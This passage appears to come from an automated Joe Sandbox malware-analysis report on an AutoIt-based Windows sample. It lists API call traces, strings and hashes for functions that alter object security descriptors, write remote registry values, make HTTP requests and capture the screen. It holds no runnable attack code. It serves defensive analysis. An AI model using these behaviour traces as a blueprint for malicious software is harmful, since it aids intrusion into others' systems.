                                                • SetRect.USER32 ref: 00B289E5
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B289F5
                                                • CreateWindowExW.USER32 ref: 00B28A28
                                                • SetWindowLongW.USER32 ref: 00B28A3C
                                                • GetClientRect.USER32 ref: 00B28A5A
                                                • GetStockObject.GDI32(00000011), ref: 00B28A76
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B28A81
                                                  • Part of subcall function 00B2912D: GetCursorPos.USER32(?), ref: 00B29141
                                                  • Part of subcall function 00B2912D: ScreenToClient.USER32(00000000,?), ref: 00B2915E
                                                  • Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B29183
                                                  • Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B2919D
                                                • SetTimer.USER32(00000000,00000000,00000028,00B290FC), ref: 00B28AA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: 4d77986959051c40fc0c62499c37394d0a2b3a968de18453feda29fba50c7f28
                                                • Instruction ID: 3b5a7281fc9a04f7ec96f5a820763133cdb733d1a00d97f32dc0151dc21a41a2
                                                • Opcode Fuzzy Hash: 4d77986959051c40fc0c62499c37394d0a2b3a968de18453feda29fba50c7f28
                                                • Instruction Fuzzy Hash: 67B18D35A002199FDB14DFA8DD86BAE3BF5FB48314F104269FA19AB290DB34E841CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B71114
                                                  • Part of subcall function 00B710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71120
                                                  • Part of subcall function 00B710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B7112F
                                                  • Part of subcall function 00B710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71136
                                                  • Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B7114D
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B70DF5
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B70E29
                                                • GetLengthSid.ADVAPI32(?), ref: 00B70E40
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00B70E7A
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B70E96
                                                • GetLengthSid.ADVAPI32(?), ref: 00B70EAD
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B70EB5
                                                • HeapAlloc.KERNEL32(00000000), ref: 00B70EBC
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B70EDD
                                                • CopySid.ADVAPI32(00000000), ref: 00B70EE4
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B70F13
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B70F35
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B70F47
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F6E
                                                • HeapFree.KERNEL32(00000000), ref: 00B70F75
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F7E
                                                • HeapFree.KERNEL32(00000000), ref: 00B70F85
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F8E
                                                • HeapFree.KERNEL32(00000000), ref: 00B70F95
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B70FA1
                                                • HeapFree.KERNEL32(00000000), ref: 00B70FA8
                                                  • Part of subcall function 00B71193: GetProcessHeap.KERNEL32(00000008,00B70BB1,?,00000000,?,00B70BB1,?), ref: 00B711A1
                                                  • Part of subcall function 00B71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B70BB1,?), ref: 00B711A8
                                                  • Part of subcall function 00B71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B70BB1,?), ref: 00B711B7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 4175595110-0
                                                • Opcode ID: 8a227102de75ef37bcd1bf5bd93d08026857a25ad1f0539110a0a49dc931ab9e
                                                • Instruction ID: 9f9176212bebaf426c27ccbaed4a9a2a73d630189f8844be67bd28d030acd702
                                                • Opcode Fuzzy Hash: 8a227102de75ef37bcd1bf5bd93d08026857a25ad1f0539110a0a49dc931ab9e
                                                • Instruction Fuzzy Hash: 37713C7291020AEBDF20EFA4DC45FAEBBB8FF05310F148556F929AB191DB719905CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B9C4BD
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BACC08,00000000,?,00000000,?,?), ref: 00B9C544
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B9C5A4
                                                • _wcslen.LIBCMT ref: 00B9C5F4
                                                • _wcslen.LIBCMT ref: 00B9C66F
                                                • RegSetValueExW.ADVAPI32 ref: 00B9C6B2
                                                • RegSetValueExW.ADVAPI32 ref: 00B9C7C1
                                                • RegSetValueExW.ADVAPI32 ref: 00B9C84D
                                                • RegCloseKey.ADVAPI32(?), ref: 00B9C881
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B9C88E
                                                • RegSetValueExW.ADVAPI32 ref: 00B9C960
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 9721498-966354055
                                                • Opcode ID: c9a584e7fc3ba366bd16ccf8135f0e45bfbafb67dd2a87c6e30bb510fa5edbb2
                                                • Instruction ID: 25acf19c1470884845afde897209fdc633494cff4e9fb6fd483fb22fb85b2862
                                                • Opcode Fuzzy Hash: c9a584e7fc3ba366bd16ccf8135f0e45bfbafb67dd2a87c6e30bb510fa5edbb2
                                                • Instruction Fuzzy Hash: A61259356042019FDB14DF14C891A6ABBE5FF88714F1588ADF89A9B3A2DB31FD41CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 00BA09C6
                                                • _wcslen.LIBCMT ref: 00BA0A01
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA0A54
                                                • _wcslen.LIBCMT ref: 00BA0A8A
                                                • _wcslen.LIBCMT ref: 00BA0B06
                                                • _wcslen.LIBCMT ref: 00BA0B81
                                                  • Part of subcall function 00B2F9F2: _wcslen.LIBCMT ref: 00B2F9FD
                                                  • Part of subcall function 00B72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B72BFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 1103490817-4258414348
                                                • Opcode ID: d14125a27e1b15e84ffeb0c7f37406d6052d4009080643645647c92c3447c97c
                                                • Instruction ID: 017e9fc555f5a774f6a7f801165e2c8fd96c1bf3d20be6410ad5e72152832f08
                                                • Opcode Fuzzy Hash: d14125a27e1b15e84ffeb0c7f37406d6052d4009080643645647c92c3447c97c
                                                • Instruction Fuzzy Hash: 52E159322183019FC714EF24C49096AB7E2FF99314F5489ADF89A9B362DB31ED45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 1256254125-909552448
                                                • Opcode ID: 844a18fed20ce2fe916edf8826e094e644afeda87b1118a3f1ac2ca9a1c93700
                                                • Instruction ID: 9acdeec1cbafa0e88c1de9029ec0b3838f26e18236fac6e481a23198096201b8
                                                • Opcode Fuzzy Hash: 844a18fed20ce2fe916edf8826e094e644afeda87b1118a3f1ac2ca9a1c93700
                                                • Instruction Fuzzy Hash: E671F33360016A8BCF20DE7CC9915FE3BE1EB61764B6145F9F85697289FA30CD8183A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcslen.LIBCMT ref: 00BA835A
                                                • _wcslen.LIBCMT ref: 00BA836E
                                                • _wcslen.LIBCMT ref: 00BA8391
                                                • _wcslen.LIBCMT ref: 00BA83B4
                                                • LoadImageW.USER32 ref: 00BA83F2
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BA5BF2), ref: 00BA844E
                                                • LoadImageW.USER32 ref: 00BA8487
                                                • LoadImageW.USER32 ref: 00BA84CA
                                                • LoadImageW.USER32 ref: 00BA8501
                                                • FreeLibrary.KERNEL32(?), ref: 00BA850D
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BA851D
                                                • DestroyIcon.USER32(?,?,?,?,?,00BA5BF2), ref: 00BA852C
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BA8549
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BA8555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 799131459-1154884017
                                                • Opcode ID: 98f0432954b0db89cdde02101411f9fa8fd693402197fea811aa4e1e5685579d
                                                • Instruction ID: 84a71ae04679aeb53057ac25ff8ad3379301f69baced1d8bf625968af0ef87b5
                                                • Opcode Fuzzy Hash: 98f0432954b0db89cdde02101411f9fa8fd693402197fea811aa4e1e5685579d
                                                • Instruction Fuzzy Hash: 0761E171944205BEEB14DF64CC86BBE7BE8FB19721F10468AF815DA1D1EF74A980C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B300C6
                                                  • Part of subcall function 00B300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00BE070C,00000FA0,5D8A404D,?,?,?,?,00B523B3,000000FF), ref: 00B3011C
                                                  • Part of subcall function 00B300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B523B3,000000FF), ref: 00B30127
                                                  • Part of subcall function 00B300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B523B3,000000FF), ref: 00B30138
                                                  • Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00B523B3,000000FF), ref: 00B3014E
                                                  • Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00B523B3,000000FF), ref: 00B3015C
                                                  • Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00B523B3,000000FF), ref: 00B3016A
                                                  • Part of subcall function 00B300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B30195
                                                  • Part of subcall function 00B300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B301A0
                                                • ___scrt_fastfail.LIBCMT ref: 00B300E7
                                                  • Part of subcall function 00B300A3: __onexit.LIBCMT ref: 00B300A9
                                                Strings
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B30122
                                                • WakeAllConditionVariable, xrefs: 00B30162
                                                • SleepConditionVariableCS, xrefs: 00B30154
                                                • kernel32.dll, xrefs: 00B30133
                                                • InitializeConditionVariable, xrefs: 00B30148
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 66158676-1714406822
                                                • Opcode ID: 8b0de57f539c88ae2ef012c5a44f1228da995e508c61c900fdfe7ade1bf73383
                                                • Instruction ID: 6ab868b2e430b83ba30d2c1c9566cb3841b796fe45007b385485289c930c71e0
                                                • Opcode Fuzzy Hash: 8b0de57f539c88ae2ef012c5a44f1228da995e508c61c900fdfe7ade1bf73383
                                                • Instruction Fuzzy Hash: 49210B32A54B126FD7217BA4AC56B7A77E4DF06F51F2001B5F805F76A1DFB49C008A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2055661098-1000479233
                                                • Opcode ID: a4ecda9022c1d62d10f1294bedd289b7d85145953ad639a5839980e8539dd56b
                                                • Instruction ID: 13e87a11154a26e9af9c9c4371ecfa32adf2dc9c9c104693151cfcb43725fde1
                                                • Opcode Fuzzy Hash: a4ecda9022c1d62d10f1294bedd289b7d85145953ad639a5839980e8539dd56b
                                                • Instruction Fuzzy Hash: 9DB1B0356083039FC710EF28C891AAEB7E5EFA5760F50499DF496872A1E730DD84CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DestroyWindow.USER32 ref: 00BA6DEB
                                                  • Part of subcall function 00B16B57: _wcslen.LIBCMT ref: 00B16B6A
                                                • CreateWindowExW.USER32 ref: 00BA6E5F
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BA6E81
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BA6E94
                                                • DestroyWindow.USER32 ref: 00BA6EB5
                                                • CreateWindowExW.USER32 ref: 00BA6EE4
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BA6EFD
                                                • GetDesktopWindow.USER32 ref: 00BA6F16
                                                • GetWindowRect.USER32(00000000), ref: 00BA6F1D
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BA6F35
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BA6F4D
                                                  • Part of subcall function 00B29944: GetWindowLongW.USER32(?,000000EB), ref: 00B29952
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 2429346358-3619404913
                                                • Opcode ID: 248407c55ef96d3c61f00049b8cdfc6689bb15fa0c6e8742b4df49a0b27ae3f0
                                                • Instruction ID: 9a0fa5a5c3d6f56dce6c684996a7c20853b1f7de2fc5f0e3ca65121a665b648a
                                                • Opcode Fuzzy Hash: 248407c55ef96d3c61f00049b8cdfc6689bb15fa0c6e8742b4df49a0b27ae3f0
                                                • Instruction Fuzzy Hash: FC717DB4148244AFDB21CF1CDC44FBABBE9FB8A304F58085DF599872A1DB71A906CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B8C4B0
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B8C4C3
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B8C4D7
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B8C4F0
                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B8C533
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B8C549
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B8C554
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B8C584
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B8C5DC
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B8C5F0
                                                • InternetCloseHandle.WININET(00000000), ref: 00B8C5FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                • String ID:
                                                • API String ID: 3800310941-3916222277
                                                • Opcode ID: fe8f6210c1c4a5b87e4f4c442ddf1e06d3fa82be324b93465635701d1fe4e41b
                                                • Instruction ID: 3b9ecbf6b93140eb6fcc04801875612274315a59f6f2251f007c76456c403830
                                                • Opcode Fuzzy Hash: fe8f6210c1c4a5b87e4f4c442ddf1e06d3fa82be324b93465635701d1fe4e41b
                                                • Instruction Fuzzy Hash: C75139B1500608BFEB21AF60C989AAB7FFCFB19754F00446AF94597660DB34E944DB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00BA8592
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85A2
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85AD
                                                • CloseHandle.KERNEL32(00000000), ref: 00BA85BA
                                                • GlobalLock.KERNEL32 ref: 00BA85C8
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BA85D7
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00BA85E0
                                                • CloseHandle.KERNEL32(00000000), ref: 00BA85E7
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00BA85F8
                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00BAFC38,?), ref: 00BA8611
                                                • GlobalFree.KERNEL32(00000000), ref: 00BA8621
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00BA8641
                                                • CopyImage.USER32 ref: 00BA8671
                                                • DeleteObject.GDI32(?), ref: 00BA8699
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BA86AF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: 2e9e5375d19eca3f3abd56be17d92f19609715ac172c1d88eadb8f3d9911cf1d
                                                • Instruction ID: 5b6e35b8ca0c9983f87e7afe6d78bf94f0e8113571df6b6ed30dfac9395310ba
                                                • Opcode Fuzzy Hash: 2e9e5375d19eca3f3abd56be17d92f19609715ac172c1d88eadb8f3d9911cf1d
                                                • Instruction Fuzzy Hash: 4B41F775600208AFDB119FA9DC89EAA7BF8EF8AB11F144058F905E7260DB309901CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDC.USER32(00000000), ref: 00B925D8
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B925E8
                                                • CreateCompatibleDC.GDI32(?), ref: 00B925F4
                                                • SelectObject.GDI32(00000000,?), ref: 00B92601
                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B9266D
                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B926AC
                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B926D0
                                                • SelectObject.GDI32(?,?), ref: 00B926D8
                                                • DeleteObject.GDI32(?), ref: 00B926E1
                                                • DeleteDC.GDI32(?), ref: 00B926E8
                                                • ReleaseDC.USER32(00000000,?), ref: 00B926F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
